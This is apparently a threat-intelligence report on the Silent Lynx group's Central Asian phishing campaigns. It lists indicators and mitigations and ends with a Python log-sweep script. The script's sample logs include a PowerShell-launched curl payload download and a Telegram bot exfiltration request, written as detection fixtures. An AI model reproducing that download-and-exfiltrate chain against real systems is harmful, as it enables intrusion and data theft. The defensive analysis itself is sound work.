Full Report
A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report.
Analysis Summary
# Threat Actor: Silent Lynx
## Attribution & Identity
* **Identified Name:** Silent Lynx
* **Attribution:** Assessed to be a Kazakhstan-origin threat actor (with medium confidence).
* **Associated Groups:** Observed tactical overlaps with YoroTrooper (aka SturgeonPhisher).
## Activity Summary
Silent Lynx has been linked to cyberattacks targeting entities in **Kyrgyzstan and Turkmenistan**. The group has a history of targeting entities across **Eastern Europe and Central Asian government think tanks** involved in economic decision-making and the banking sector.
Observed campaigns include:
1. **Campaign 1 (Detected Dec 27, 2024):** Involved a spear-phishing email with a RAR attachment leading to an ISO file. The ISO contained a malicious C++ binary and a decoy PDF, which ultimately launched a PowerShell script for command and control/exfiltration via Telegram bots.
2. **Campaign 2:** Involved a malicious RAR archive containing a decoy PDF and a Golang executable designed to establish a reverse shell.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Spear-phishing emails containing RAR archive attachments.
* **Payload Delivery:** Utilizing ISO files (in one campaign) to deliver payloads.
* **Execution:** Use of a malicious **C++ binary** and a **PowerShell script**.
* **Command and Control (C2)/Exfiltration:** Use of **Telegram bots** (e.g., `@south_korea145_bot` and `@south_afr_angl_bot`) for command execution and data exfiltration.
* **Command Execution/Payload Retrieval:** Execution of **`curl` commands** to download secondary payloads from remote infrastructure or Google Drive.
* **Implied Persistence/Access:** Establishment of a **reverse shell** (in the Golang campaign).
* *No specific MITRE ATT&CK IDs were provided in the source text.*
## Targeting
* **Sectors:** Embassies, the banking sector (government-backed banks), lawyers, and government/economic think tanks.
* **Geography:** Kyrgyzstan and Turkmenistan (recent focus); Eastern Europe and Central Asia (historical focus).
* **Victims:** Specific named victims were not listed, only high-level sectors.
## Tools & Infrastructure
* **Malware Families/Loaders:** Custom loaders written in **PowerShell, Golang, and C++**.
* **Infrastructure:**
  * Command & Control/Payload Download Server: `pweobmxdlboi[.]com`
  * Reverse Shell Destination: `185.122.171[.]22:8082`
  * C2/Exfiltration Vectors: Telegram bots (`@south_korea145_bot` and `@south_afr_angl_bot`).
  * Payload Hosting: Google Drive.
## Implications
Silent Lynx employs a sophisticated, multi-stage attack chain utilizing common, legitimate communication platforms (Telegram) for C2, alongside custom binaries in C++/Golang. This suggests an actor focused on achieving deep, persistent access on strategically sensitive government and financial entities within Central Asia. Their use of multiple languages (C++, Golang, PowerShell) indicates adaptive development capabilities.
## Mitigations
* Implement stringent email filtering and inspection for suspicious RAR/ISO attachments, especially those originating from external sources.
* Monitor network traffic for connections to known command-and-control infrastructure (e.g., `pweobmxdlboi[.]com`, `185.122.171[.]22:8082`).
* Apply strong controls over PowerShell execution (e.g., AppLocker, constrained language mode) to prevent script execution from unexpected file types or locations.
* Monitor for unusual network activity communicating with Telegram services for command execution or data exfiltration, if external Telegram usage is not explicitly required for business operations.
* Treat document workflows in which an archive or disk image launches a binary or script alongside a decoy document (e.g., an ISO bundling a C++ binary with a PDF) as suspicious, and inspect such containers before their contents are opened.
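The network-level mitigations above can be turned into a small log sweep. The block below is an added example, not code from the Seqrite report or from this page: it refangs the indicators the page lists (`pweobmxdlboi[.]com`, `185.122.171[.]22:8082`), then scans constructed proxy, DNS, netflow and process-creation lines for the behaviours the report describes (contact with the C2 domain or reverse-shell endpoint, Telegram bot API use, and `curl` spawned by PowerShell to fetch a payload from Google Drive). The log line formats, hostnames, timestamps, the bot token and the Drive file id are all invented for illustration; only the domain and IP:port come from the page.

```python
"""Sweep sample logs for the Silent Lynx network indicators and behaviours
described on the page. Added example; log formats and hostnames are assumed."""
import re
from dataclasses import dataclass
from typing import List

# Indicators exactly as the page lists them (defanged with "[.]").
DEFANGED_IOCS = {
    "known_c2_domain": "pweobmxdlboi[.]com",
    "known_reverse_shell": "185.122.171[.]22:8082",
}


def refang(value: str) -> str:
    """Turn a defanged indicator ('x[.]y', 'hxxp://') back into a matchable form."""
    return value.replace("[.]", ".").replace("hxxp", "http")


@dataclass
class Alert:
    rule: str
    line: str


# Behavioural patterns (assumptions based on the page's TTP description):
# - Telegram Bot API calls look like api.telegram.org/bot<token>/<method>
# - curl launched with powershell.exe as parent, in a process-creation log
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:", re.IGNORECASE)
POWERSHELL_SPAWNS_CURL = re.compile(
    r"parent=powershell\.exe.*image=curl\.exe.*https?://", re.IGNORECASE
)


def _exact_indicator(ioc: str) -> re.Pattern:
    """Match a refanged indicator as a whole token, not as a substring of a
    longer hostname (e.g. avoid matching 'notpweobmxdlboi.com')."""
    return re.compile(r"(?<![\w.-])" + re.escape(refang(ioc)) + r"(?![\w-])")


INDICATOR_PATTERNS = {name: _exact_indicator(ioc) for name, ioc in DEFANGED_IOCS.items()}


def scan_line(line: str) -> List[Alert]:
    """Return every rule that fires on a single log line."""
    hits = [Alert(name, line) for name, pat in INDICATOR_PATTERNS.items() if pat.search(line)]
    if TELEGRAM_BOT_API.search(line):
        hits.append(Alert("telegram_bot_api", line))
    if POWERSHELL_SPAWNS_CURL.search(line):
        hits.append(Alert("powershell_curl_download", line))
    return hits


def scan(lines: List[str]) -> List[Alert]:
    """Scan a batch of log lines in order and collect all alerts."""
    alerts: List[Alert] = []
    for line in lines:
        alerts.extend(scan_line(line))
    return alerts


# Constructed sample logs (hostnames, times, token and Drive id are invented).
SAMPLE_LOGS = [
    "proxy   2024-12-27T09:14:02Z ws-0412 CONNECT pweobmxdlboi.com:443 200",
    "proxy   2024-12-27T09:14:05Z ws-0412 POST https://api.telegram.org/bot123456:ABCDEF/sendDocument 200",
    "dns     2024-12-27T09:13:59Z ws-0412 A pweobmxdlboi.com",
    "netflow 2024-12-27T09:20:11Z ws-0412 -> 185.122.171.22:8082 TCP",
    'proc    2024-12-27T09:14:01Z ws-0412 parent=powershell.exe image=curl.exe '
    'cmdline="curl -o C:\\Users\\Public\\a.exe https://drive.google.com/uc?id=PLACEHOLDER"',
    "proxy   2024-12-27T10:00:00Z ws-0099 GET https://example.org/index.html 200",
    "dns     2024-12-27T10:00:01Z ws-0099 A notpweobmxdlboi.com",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(f"[{alert.rule}] {alert.line}")
```

The indicator match is anchored on token boundaries so that a look-alike hostname such as the last constructed DNS line does not fire; in production the same `scan` function would be fed from a SIEM export rather than the embedded sample list, and the behavioural rules (Telegram bot API, PowerShell-spawned `curl`) should be tuned against the organisation's legitimate Telegram and scripting usage before alerting.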